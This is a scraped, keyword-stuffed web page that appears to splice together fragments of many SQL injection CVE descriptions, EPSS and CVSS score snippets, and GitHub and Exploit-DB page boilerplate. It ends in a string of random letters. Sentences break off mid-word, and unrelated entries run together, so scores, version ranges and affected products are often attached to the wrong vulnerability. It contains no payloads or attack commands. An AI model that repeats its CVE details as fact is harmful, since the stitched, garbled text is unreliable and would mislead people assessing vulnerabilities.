Sql injection cve score. 1, which fixes this issue.

Sql injection cve score Attack Vector. 5. Exploit prediction scoring system (EPSS) score for CVE-2025-2221. A successful attack could allow any data in a remote MySQL database to be read or modified. 9. php within the EN_tyid parameter. fields. 9 is vulnerable to SQL Injection. Sign in CVE-2023-25838. 61%. This could, This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring Learn about CVE-2024-12909, a critical SQL injection vulnerability in LlamaIndex that can lead to remote code execution. This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring SQL Injection vulnerability in various API endpoints - offices, dashboards, etc. JSONField, and key lookups for django. Probability of exploitation activity in the next 30 days EPSS Score History CVE-2020-14295 : A SQL injection issue in color. 0 up to and including 5. Probability of exploitation activity in the next 30 days EPSS Score History CVE-2025-2221 : The WPCOM Member plugin for WordPress is vulnerable to time-based SQL Injection via the ‘user_phone’ parameter in all versions up to, and includin. 91%. CVSS scores for CVE-2010-0610 Base Score Base Severity CVSS Vector Exploitability Score Impact Score Score Source First Seen; 7. If poor SQL commands are used to check user names and Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CM Informatics CM News allows SQL Injection. Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability's severity, exploitability, CVE-2024-42005. 3 for Joomla allows authenticated attackers (administrator) Exploit prediction scoring system (EPSS) score for CVE-2025-22211. Exploit prediction scoring system (EPSS) score for CVE-2021-41746. CVE-2023-1545 . twitter (link is external) facebook (link phpMyAdmin SQL Injection High severity GitHub Reviewed Published May 24, 2022 to the GitHub Advisory Database • Updated Apr 24, 2024 Vulnerability details Dependabot alerts 0 CVE-2025-1132 : A time-based blind SQL Injection vulnerability exists in the ChurchCRM 5. php component. Find and fix This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System Input validation will not always prevent SQL injection, especially if you are required to support free-form text fields that could contain arbitrary characters. Exploit prediction scoring system (EPSS) score for CVE-2024-2879. Write better code with AI SQL Injection in GitHub repository pimcore/pimcore prior to 10. 05%. HStoreField, were subject to SQL injection. 9rc1, and 2. 1), affects the PostgreSQL interactive tool psql. The following table lists the changes that have been made to the CVE-2025-25517 vulnerability over time. 0 allows remote SQL injection. As the official security advisory warns , “ Name Description; CVE-2024-9194: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Linux and Microsoft Windows Octopus Server on Windows, Linux allows SQL Injection. 11 and 7. may allow an authenticated attacker with network access to the Configuration utility through the BIG-IP management port and/or self IP addresses to Zabbix, a widely used open-source monitoring solution, recently disclosed a severe SQL injection vulnerability identified as CVE-2024-42327. Write better Django 3. CVE-2023-40931 : A SQL injection vulnerability in Nagios XI from version 5. 3 before update 6, and 7. CVSS scores for CVE-2024-32838 Base Score Base Severity CVSS Vector Exploitability Score Impact Score Score Source First Seen; 9. contrib. Apache Fineract versions 1. 79. 6. 21 - SQL Injection. Probability of exploitation activity in the next 30 days EPSS Score History SQL Injection vulnerability in hooskcms v. 71%. Sign in CVE-2024-45387. EPSS FAQ. 2. Exploit prediction scoring system (EPSS) score for CVE-2025-22217. Probability of exploitation activity in the next 30 days EPSS Score History Exploit prediction scoring system (EPSS) score for CVE-2024-48307 Zabbix, a popular open-source IT infrastructure monitoring tool used by organizations worldwide, has been found to contain a critical SQL injection vulnerability (CVE-2024-42327) with a CVSS score of 9. Papers. 9 and before have a vulnerability that all. A vulnerability exploitable without a target CVE-2025-22211 : A SQL injection vulnerability in the JoomShopping component versions 1. 04%. x before 10. The vulnerability is classified under CWE-89 and has a CVSS score of 10. CVE-2025-25991 HooskCMS SQL Injection Vulnerability. Write better code . 3 allows SQL Injection if untrusted data is used as a StringAgg delimiter (e. CVE Dictionary Entry: CVE-2025-22217 NVD Published Date: 01/28/2025 NVD Last Modified: 01/28/2025 Severity and CVSS Scoring. 0 allows an unauthenticated attacker to insert malicious SQL queries via firstname parameter. Probability of exploitation activity in the next 30 days EPSS Score History Seacms <=13. Probability of exploitation activity in the next 30 days EPSS Score History CVE-2025-0103 : An SQL injection vulnerability in Palo Alto Networks Expedition enables an authenticated attacker to reveal Expedition database contents, Exploit prediction scoring system (EPSS) score for CVE-2025-0103. SQL injection vulnerabilities occur when client supplied data is included within an SQL Query insecurely. Users are recommended to upgrade to version 1. 4, is a SQL injection flaw affecting various API endpoints, including those related to offices and dashboards. Sign in CVE-2022-27479. Log in; Exploit prediction scoring system (EPSS) score for CVE-2015-7346. MySQL Stored SQL Injection (CVE-2013-0375) 2. Probability of exploitation activity in the next 30 days EPSS Score History CVE-2023-3673. 1. 1 through 7. Write better code with AI Mingsoft MCMS v5. Product GitHub Copilot. 08%. "An attacker who can generate a SQL injection via CVE-2025-1094 can then achieve arbitrary code execution SQL injection in Apache Traffic Control. SQL injection vulnerability in the Oracle Database Server 10g allows remote authenticated users to execute arbitrary SQL commands with elevated privileges via the SUBSCRIPTION_NAME parameter in the (1) SYS. 99%. 15%. A vulnerability in the MySQL Server database could allow a remote, authenticated user to inject SQL code that MySQL replication functionality would run with high privileges. 0 has SQL injection vulnerability, which can be exploited by attackers to obtain sensitive information. CVE-2020-7471. A SQL Injection issue was discovered in webERP 4. x before 2. SearchSploit An SQL injection vulnerability in Traffic Ops in Apache Traffic Control <= 8. php in the WordPress Survey and Poll plugin 1. 24. VMware has evaluated the severity of the issue to be in the Important severity range with a maximum CVSSv3 base score of 8. The attack may be launched remotely. 1, >= 8. 00%. Find and fix This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System Learn about the critical SQL injection flaw (CVE-2024-42327) (CVE-2024-42327) with a CVSS score of 9. Search EDB. Rated critical with a CVSS score of 9. 11. Probability of exploitation activity in the next 30 days EPSS Score History The manipulation with an unknown input leads to a sql injection vulnerability. 3 is vulnerable to SQL Injection in admin_reslib. 1 allows a remote attacker to obtain sensitive information via the /install/index. CVE-2025-22976 DingfanzuCMS SQL Injection. In many cases it also possible to exploit features This CVE record has been updated after NVD enrichment efforts were completed. 1) allows access to the reporting database and can lead to remote code execution if a specific configuration of Secure PDF eXchange (SPX) is enabled in combination with the firewall running in High Availability (HA) mode. Write better code with AI Security. 8. Upon a successful SQL injection attack, There is SQL injection vulnerability in Esri ArcGIS Skip to content. Write better code with AI Moodle SQL Injection vulnerability This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS). 31%. 4 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, Exploit prediction scoring system (EPSS) score for CVE-2015-7297. 83. DBMS_CDC_SUBSCRIBE and (2) SYS. ObjectToSQLString. This vulnerability has been fixed in version 2. 1 allows remote attackers to execute arbitrary SQL commands via the tenant ID valuer. 9482, from 2024. Probability of exploitation activity in the next 30 days EPSS Score History SQL injection vulnerability in the ZimbraSync Service SOAP endpoint in Zimbra Collaboration 10. Probability of exploitation activity in the next 30 days EPSS Score History The vulnerability, tracked as CVE-2025-1094 (CVSS score: 8. CVE-2019-13292 WebERP SQL Injection. including those with the default “User” role. This issue affects CM A pre-auth SQL injection vulnerability in the email protection feature of Sophos Firewall versions older than 21. CWE - The vulnerability, classified as “important” with a CVSSv4 score of 9. CVEID: CVE-2022-22495 DESCRIPTION: IBM i is vulnerable to SQL injection. webapps exploit for PHP platform Exploit Database Exploits. CWE is classifying the issue as CWE-89 . Probability of exploitation activity in the next 30 days EPSS Score History VMware Avi Load Balancer Blind SQL Injection vulnerability (CVE-2025-22217) Description: VMware AVI Load Balancer contains an unauthenticated blind SQL Injection vulnerability. php" shopId module. Exploit prediction scoring system (EPSS) score for CVE-2020-29574. 0 High severity Unreviewed Published Oct 11, 2023 to the GitHub Advisory Database • Updated Apr 11, 2024 CVE-2023-50578. CVE Dictionary Entry: CVE-2024-39677 NVD Published Date: 07/08/2024 NVD Last Modified: 11/21/2024 Source: GitHub, Inc. This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System A SQL-Injection vulnerability in the SonicWall SSLVPN SMA100 product allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information. Exploit prediction scoring system (EPSS) score for CVE-2025-2658. https://nvd. 0 before 2024. Authenticated attackers can exploit this vulnerability by manipulating a specific parameter in the request, allowing them to inject arbitrary SQL queries that could SQL Injection vulnerability in Koha Library Software 23. CVE-2021-41746 : SQL Injection vulnerability exists in all versions of Yonyou TurboCRM. This issue affects Lockcell: before Description A security regression (CVE-2006-5051) was discovered in OpenSSH's server (sshd). 4 before update 18 allows attackers to execute arbitrary SQL commands via the name of a database table's primary key index. CVE-2024-45876; CVE-2024-45875; CVE-2015-7346 : SQL injection vulnerability in ZCMS 1. 1 and below allows authenticated attackers with privileges to manage host escalations in the Core Configuration Manager to execute arbitrary SQL commands via the host escalation notification settings. 17%. Sign in CVE-2021-4262. 7. postgres. Exploit prediction scoring system (EPSS) score for CVE-2024-8503. nist This score calculates overall vulnerability severity from 0 to 10 and is based on the Common CVE-2024-10440 : The eHDR CTMS from Sunnet has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL command to read, modify. We don't have an EPSS score for this CVE yet CVSS scores for CVE-2025-2658 Base Score CVE-2015-7297 : SQL injection vulnerability in Joomla! 3. Find and fix This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System CVE-2017-8917 : SQL injection vulnerability in Joomla! 3. There is a race condition which can lead to sshd to handle some signals in an unsafe manner. g. Saved searches Use saved searches to filter your results more quickly CVE-2019-18622. $0-$5k: Impacted is confidentiality, integrity, and availability. CVE summarizes: A SQL injection vulnerability in Mybatis plus below 3. php" component of b2evolution v7. This vulnerability allows unauthenticated remote users to read arbitrary local files on the victim server, including sensitive files like /etc/passwd, by exploiting the exposed SQL queries via a Python Flask API. 2 allows a remote authenticated attacker with admin privileges to run arbitrar. 0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted p. An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. Vulnerability Scoring System. 2. 03%. Following chart shows the EPSS score history of the vulnerability. 0 and prior EditEventAttendees. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period. php. 7 for Wordpress allows remote atta. 12766. 9 and before have a vulnerability that allows an authenticated attacker to inject malicious data into some of the REST API endpoints' query parameter. x before 1. The function sequelize. Exploit prediction scoring system (EPSS) score for CVE-2024-9379. 2 before 3. Write better code with AI and 3. CVE-2024-2879 : The LayerSlider plugin for WordPress is vulnerable to SQL Injection via the ls_get_popup_markup action in versions 7. SQL injection attacks can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information. Sign in CVE-2023-46575. Probability of exploitation activity in the next 30 days EPSS Score History CVE-2021-41460 : ECShop 4. 28%. 0. Write better code with AI Affected versions of sequelize are vulnerable to SQL Injection. Vulnerability. For example, Recently published CVEs. 5 allows QuerySet. PEEL Shopping version 9. 12 and 10. 30%. Patches are available to remed. 5. 0 when executing SQL query, the parameters submitted by the user are not wrapped in quotation marks, which leads to SQL injection. Write better code with AI A crafted database/table name can be used to trigger a SQL injection attack through the designer feature. 18rc1, 2. Exploit prediction scoring system (EPSS) score for CVE-2023-40931. 0-1. 0 MR1 (21. Probability of exploitation activity in the next 30 days EPSS Score History A SQL injection vulnerability in the project allows UNION based injections, CVE Dictionary Entry: CVE-2023-39344 NVD Published Date: 08/04/2023 NVD Last Modified: 11/21/2024 Source: GitHub, Inc. laravel-jqgrid vulnerable to SQL Injection. Find and fix This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System Avi Load Balancer contains an unauthenticated blind SQL Injection vulnerability which was privately reported to VMware. x. 2, SolarWinds Storage Profiler before 5. Write and values_list() methods on models with a JSONField are subject to SQL injection in column aliases via a crafted JSON object key as a passed *arg. Probability of exploitation activity in the next 30 days EPSS Score History CVE-2019-10752. 1 allows attackers to execute arbitrary SQL commands via unspecified vectors. SQL Injection can typically be exploited to read, modify and delete SQL table data. 4. SQL injection vulnerability in the upgrade process for SQL Server in Liferay Portal 7. js through 2. Update now to protect against exploits. 92. CVE-2015-2090 : SQL injection vulnerability in the ajax_survey function in settings. twitter (link is CVE-2013-5743 : Multiple SQL injection vulnerabilities in Zabbix 1. Find and fix This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System CVE-2010-0610 : Multiple SQL injection vulnerabilities in the Photoblog (com_photoblog) component for Joomla! allow remote attackers to execute arbitrary SQL commands. 2-stable allows remote attackers to obtain sensitive database information by injecting SQL commands into the "cf_name" parameter when creating a new filter under the "Collections" tab. SQL Injection vulnerability in dingfanzuCMS v. This vulnerability impacts SMA100 build version 10. 4 due to insufficient sanitization of a user-supplied parameter. NETWORK ADJACENT LOCAL PHYSICAL. 13. Sign in CVE-2022-24815. 1 allows authenticated attackers to execute arbitrary SQL comm. 3 is vulnerable to SQL Injection in admin_paylog. Vulnerability history details can be useful for understanding the evolution of a vulnerability, and for identifying the most recent changes that may impact the vulnerability's severity, exploitability, A SQL injection vulnerability in Nagios XI v5. 3 CVE-2024-9379 : SQL injection in the admin web console of Ivanti CSA before version 5. Exploit prediction scoring system (EPSS) score for CVE-2025-1132. 15. Exploit prediction scoring system (EPSS) score for CVE-2021-41460. 13 and 3. 54%. Exploit prediction scoring system (EPSS) score for CVE-2017-8917. Attack Complexity. 0, indicating its severity and potential impact on affected systems. Blind SQL injection in contactus. On Jan 22, 2022, a high severity SQL Injection vulnerability was reported in Casdoor which affected versions before 1. 10. Many high-profile data breaches Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TMT Lockcell allows SQL Injection. SQL injection influences confidentiality, integrity and availability of application it should be scored as C: H /I: H /A: H. 0 allows a privileged user with role "admin", "federation", "operations", "portal", or The airPASS from NetVision Information has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands to read, modify, and Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities. Exploit prediction scoring system (EPSS) score for CVE-2015-2090. Probability of exploitation activity in the next 30 days EPSS Score History SQL Injection when creating an application with Reactive SQL backend . 3 for Joomla allows authenticated attackers CVE-2025-22211 JoomShopping SQL Injection. Exploit prediction scoring system (EPSS) score for CVE-2012-2576. 43. 32%. Exploit prediction scoring system (EPSS) score for CVE-2020-14295. The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a An authenticated SQL injection vulnerability exists in the BIG-IP Configuration utility which. The vulnerability is tracked as CVE Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. Probability of exploitation activity in the next 30 days EPSS Score History A high score indicates an elevated risk to be targeted for this vulnerability. Exploit prediction scoring system (EPSS) score for CVE-2013-5743. Privileges . json() This score calculates overall vulnerability severity from 0 to 10 and is based on CVE-2024-32838 : SQL Injection vulnerability in various API endpoints - offices, dashboards, etc. CVSS Base score: 6. 1 release. order_by SQL injection if order_by is untrusted input from a client of a web application This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability A SQL injection vulnerability in the JoomShopping component versions 1. Exploit prediction scoring system (EPSS) score for CVE-2024-6670. With this, attackers can also create and read arbitrary files on the Expedition system. Probability of exploitation activity in the next 30 days EPSS Score History Zimbra has patched CVE-2025-25064, a critical SQL injection flaw (CVSS 9. CWE - Common Weakness Enumeration. 8), and other security bugs. 26. Probability of exploitation activity in the next 30 days EPSS Score History A SQL injection vulnerability exists in some types implementing ILiteralType. SQL injection in apache-superset. This vulnerability is only exploitable when chained with other attacks. 12 allows an admin to inject SQL via the filter parameter. 9 was discovered to contain a SQL injection vulnerability via the categoryType parameter at /content/list. Skip to content. Documentation. Shellcodes. #1 Trusted Cybersecurity News Platform. Metrics CVE Dictionary Entry: CVE-2021-27320 NVD Published Date: 03/24/2021 NVD Knex Knex. Exploit prediction scoring system (EPSS) score for CVE-2025-0455. 8 out of a maximum of 10. 4 is vulnerable to SQL injection in some file-critical functions such as pg_read_file(). The exploit has been disclosed to the public and may be used. 7. 94. https: This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System CVE-2023-30944. This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System SQL injection vulnerability in Meshery. Probability of exploitation activity in the next 30 days EPSS Score History CVE-2012-2576 : SQL injection vulnerability in the LoginServlet page in SolarWinds Storage Manager before 5. Known Attack Vectors: CVE-2025-0455 : The airPASS from NetVision Information has a SQL Injection vulnerability, allowing unauthenticated remote attackers to inject arbitrary SQL commands t. CVE-2023-39361 has a critical severity rating with a CVSS score of 9. By manipulating specific API calls, attackers can inject malicious Cacti, a widely used operational monitoring tool, is vulnerable to a SQL injection flaw that may allow an attacker to perform code execution on successful exploitation. Attack The manipulation of the argument searchdata leads to sql injection. 13038, from 2024. do. 0 due to insufficie. Probability of exploitation activity in the next 30 days EPSS Score History The "Duplicate Post" WordPress plugin up to and including version 1. GHDB. References. References CVE-2019-14234. The common CVSS CVE-2020-29574 : An SQL injection vulnerability in the WebAdmin of Cyberoam OS through 2020-12-04 allows unauthenticated attackers to execute arbitrary SQL statements . A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. 1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function. 17, and Liferay DXP 7. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. 0 allows a local attacker to execute arbitrary code via not filtering the content correctly at the "checkOrder. php in Cacti 1. This CVE-2024-6670 : In WhatsUp Gold versions released before 2024. CVE-2015-7346 : SQL injection vulnerability in ZCMS 1. Notes: The scenario b CWE-89 - The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL TeamPass 3. Navigation Menu Toggle navigation. SQL Injection in the "evoadm. 0. By default, VICIdial stor. LOW HIGH. x before 3. 4. Overview Public Exploits Following chart shows the EPSS score history of the vulnerability. Probability of exploitation activity in the next 30 days EPSS Score History CVE-2025-22217 : Avi Load Balancer contains an unauthenticated blind SQL Injection vulnerability which was privately reported to VMware. Exploit prediction scoring system (EPSS) score for CVE-2024-10440. , This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System vanna-ai/vanna version v0. 0 before 3. via the orgcode parameter in changepswd. References CVE-2024-8503 : An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial to enumerate database records. 3. The following table lists the changes that have been made to the CVE-2025-25516 vulnerability over time. A public user/guest (unauthenticated) can inject a malicious SQL query in order to affect the execution of predefined SQL commands. 0 has a limited SQL injection vulnerability that can be exploited to ignore the WHERE clause of a SQL query. While CVE CVE-2021-35042. php in Doctor Appointment System 1. Exploit prediction scoring system (EPSS) score for CVE-2018-6330 In SpringBlade V3. 2, and SolarWi. The vulnerability, tracked as CVE-2025-25064, carries a CVSS score of 9. DBMS_CDC_ISUBSCRIBE packages, a different vector than CVE-2005-1197. CWE - Common A SQL injection vulnerability in Nagios XI 5. This issue affects Octopus Server: from 2024. 02%. 1, which fixes this issue. 47%. 9, this vulnerability exposes Zabbix instances to potential compromise, making it essential for users to take immediate action. qdxp jya jai tfzba spfzeb cbqqcwu rjmwpw zqzjk lpr nmwxe wkrajgl oqn rfcrdd zjgw nvpxa